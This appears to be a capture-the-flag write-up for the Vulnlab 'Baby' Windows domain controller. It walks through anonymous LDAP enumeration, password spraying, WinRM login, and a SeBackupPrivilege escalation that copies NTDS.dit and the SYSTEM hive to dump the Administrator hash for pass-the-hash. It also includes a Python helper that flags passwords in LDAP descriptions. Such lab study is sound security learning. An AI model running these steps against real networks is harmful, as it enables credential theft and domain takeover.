Vulnlab - Baby
NMAP
Nmap scan report for 10.10.83.40
Host is up (0.081s latency).
Not shown: 65523 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
135/tcp open tcpwrapped
139/tcp open tcpwrapped
389/tcp open tcpwrapped
445/tcp open tcpwrapped
593/tcp open tcpwrapped
3268/tcp open tcpwrapped
3389/tcp open tcpwrapped
| ssl-cert: Subject: commonName=BabyDC.baby.vl
| Issuer: commonName=BabyDC.baby.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-06-16T16:00:59
| Not valid after: 2023-12-16T16:00:59
| MD5: 55aa85b5f2fd316af5fbb1c8ad357d53
|_SHA-1: ae0ab02e5de2d54a9180931ff745d5a00deb41a2
|_ssl-date: 2023-06-17T16:09:48+00:00; +24s from scanner time.
5985/tcp open tcpwrapped
49664/tcp open tcpwrapped
60083/tcp open tcpwrapped
65331/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
PORT 445 (SMB)
Enumerating SMB shares as an anonymous user fails: unauthenticated access is not allowed to list or read shares.
![](https://i.imgur.com/eYIUk4w.png)
PORT 389 (LDAP)
Checking LDAP with a null bind (anonymous authentication):
ldapsearch -x -H ldap://10.10.83.40 -D '' -w '' -b "DC=baby,DC=vl"
This returns directory objects, including usernames.
![](https://i.imgur.com/isY45pH.png)
We can use grep and awk to filter out the sAMAccountName values:
ldapsearch -x -H ldap://10.10.83.40 -D '' -w '' -b "DC=baby,DC=vl" | grep sAMAccountName | awk -F: '{ print $2 }' | awk '{ gsub(/ /,""); print }'
![](https://i.imgur.com/spQzXI1.png)
![](https://i.imgur.com/YfypfOu.png)
We can also grep for the description attribute; Teresa.Bell's entry has a description that contains a password.
![](https://i.imgur.com/WMFF3HJ.png)
But authenticating as Teresa with this password fails, so it is not her password.
![](https://i.imgur.com/QUSMgC3.png)
Spraying this password across the enumerated usernames also fails.
![](https://i.imgur.com/iznIIgx.png)
Foothold (Caroline.Robinson)
Going back to the LDAP output, there is a user Caroline.Robinson whose entry has none of the usual attributes (no sAMAccountName), so she was missed when filtering on sAMAccountName.
![](https://i.imgur.com/bDojsRM.png)
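The grep-for-sAMAccountName pipeline above is exactly what missed Caroline.Robinson, and it also does not tie descriptions to the account they belong to. The script below is an added example (not code from the original writeup): a small LDIF parser for ldapsearch output that reports every user object, derives a logon name from the CN when sAMAccountName is absent (the First.Last form is an assumption based on the other accounts and must be verified by authenticating), and flags descriptions that mention a password. The LDIF it ships with is a constructed sample, not a capture from the box.

```python
"""Enumerate AD users from ldapsearch (LDIF) output.

Added example, not code from the original writeup. It replaces the
grep/awk pipeline with a small LDIF parser so that entries lacking a
sAMAccountName are still reported (derived from the CN in the DN) and so
that description attributes can be scanned for credential hints.
Usage: ldapsearch -x -H ldap://10.10.83.40 -b "DC=baby,DC=vl" | python3 ldap_users.py
"""
import base64
import re
import sys

# Constructed sample of ldapsearch output for this example (not a real capture).
SAMPLE_LDIF = """\
# extended LDIF

dn: CN=Teresa Bell,OU=it,DC=baby,DC=vl
objectClass: top
objectClass: person
objectClass: user
cn: Teresa Bell
sAMAccountName: Teresa.Bell
description: Set initial password to Example123!

dn: CN=Caroline Robinson,OU=it,DC=baby,DC=vl
objectClass: top
objectClass: person
objectClass: user
cn: Caroline Robinson

dn: CN=Connor Wilkinson,OU=it,DC=baby,DC=vl
objectClass: user
sAMAccountName:: Q29ubm9yLldpbGtpbnNvbg==
description: A long description that ldapsearch folds onto a sec
 ond line

dn: CN=Domain Users,CN=Users,DC=baby,DC=vl
objectClass: group
sAMAccountName: Domain Users

search: 2
result: 0 Success
"""

CRED_HINT = re.compile(r"pass(word|wd)?|pwd|cred", re.I)


def parse_ldif(text):
    """Return one {attribute: [values]} dict per LDIF record.

    Handles folded lines (continuation lines start with a space) and
    base64-encoded values (attribute:: value), both of which ldapsearch emits.
    """
    unfolded = []
    for raw in text.splitlines():
        if raw.startswith(" ") and unfolded:
            unfolded[-1] += raw[1:]          # join a folded line to its parent
        else:
            unfolded.append(raw)

    records, current = [], {}
    for line in unfolded + [""]:             # sentinel flushes the last record
        if not line.strip() or line.startswith("#"):
            if current:
                records.append(current)
                current = {}
            continue
        attr, sep, value = line.partition(":")
        if not sep:
            continue
        if value.startswith(":"):            # "attr:: base64"
            value = base64.b64decode(value[1:].strip()).decode("utf-8", "replace")
        else:
            value = value.strip()
        current.setdefault(attr.strip(), []).append(value)
    return records


def enumerate_users(records):
    """Pick user objects (not groups or computers) and give each a logon name.

    If sAMAccountName is missing, fall back to the CN rewritten as First.Last;
    that naming convention is an assumption taken from the other accounts.
    """
    users = []
    for rec in records:
        if "dn" not in rec:                  # e.g. the trailing "search:/result:" block
            continue
        classes = {c.lower() for c in rec.get("objectClass", [])}
        if "user" not in classes or "computer" in classes:
            continue
        sam = rec.get("sAMAccountName", [None])[0]
        cn_match = re.match(r"CN=([^,]+)", rec["dn"][0], re.I)
        cn = cn_match.group(1) if cn_match else ""
        description = " ".join(rec.get("description", []))
        users.append({
            "name": sam if sam else cn.replace(" ", "."),
            "from_sam": sam is not None,
            "description": description,
            "cred_hint": bool(CRED_HINT.search(description)),
        })
    return users


if __name__ == "__main__":
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_LDIF
    for u in enumerate_users(parse_ldif(text)):
        flag = " <-- credential hint" if u["cred_hint"] else ""
        src = "" if u["from_sam"] else " (no sAMAccountName; derived from CN)"
        print(f"{u['name']}{src}{flag}")
        if u["description"]:
            print(f"    description: {u['description']}")
```

Run it with the real ldapsearch output piped in; any name marked "derived from CN" is a guess to confirm with a single authentication attempt, and any "credential hint" line deserves a spray across all listed names, since, as above, the password in one user's description may belong to another account.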
For this username the password from the description is valid, but it is flagged as expired and must be changed before it can be used.
![](https://i.imgur.com/PzhDxh5.png)
https://exploit-notes.hdks.org/exploit/windows/active-directory/smb-pentesting/
smbpasswd -U Caroline.Robinson -r 10.10.83.40
![](https://i.imgur.com/fttEduI.png)
We can test WinRM authentication to see whether this user is allowed to use WinRM (for example, as a member of the Remote Management Users group).
![](https://i.imgur.com/kTADncK.png)
The Pwn3d! marker means we can log in through WinRM:
evil-winrm -i 10.10.83.40 -u 'Caroline.Robinson' -p 'BabyStart12345$Abc#!'
![](https://i.imgur.com/rgJR7uU.png)
Checking this account's privileges with whoami /all shows that it has SeBackupPrivilege.
![](https://i.imgur.com/JOAVqu3.png)
Caroline's password keeps getting reset by a script running on the box, so you may need to change it again.
Privilege Escalation (Administrator)
Following this article to abuse SeBackupPrivilege:
https://www.hackingarticles.in/windows-privilege-escalation-sebackupprivilege/
Create a diskshadow script file (.dsh) and convert it to DOS (CRLF) line endings with unix2dos:
set context persistent nowriters
add volume c: alias owo
create
expose %owo% z:
![](https://i.imgur.com/5jeZKcC.png)
Now copy NTDS.dit from the exposed shadow volume into the current directory with robocopy in backup mode (/b), which is the step that actually uses SeBackupPrivilege to read the file regardless of its ACL.
![](https://i.imgur.com/28xvP0k.png)
![](https://i.imgur.com/yIB1HM8.png)
Download the file to our Kali machine:
![](https://i.imgur.com/1oEKuMr.png)
After the download we have ntds.dit locally.
![](https://i.imgur.com/S2EiIxv.png)
We'll also need the SYSTEM hive, which holds the boot key needed to decrypt the hashes in NTDS.dit:
reg save hklm\system C:\Windows\Temp\system
![](https://i.imgur.com/Ax68SRu.png)
With both files we can parse NTDS.dit, dump the hashes and obtain the Administrator's NT hash.
![](https://i.imgur.com/Xcp2BMe.png)
Now, with pass-the-hash, we can log in as Administrator.
![](https://i.imgur.com/D1c5czy.png)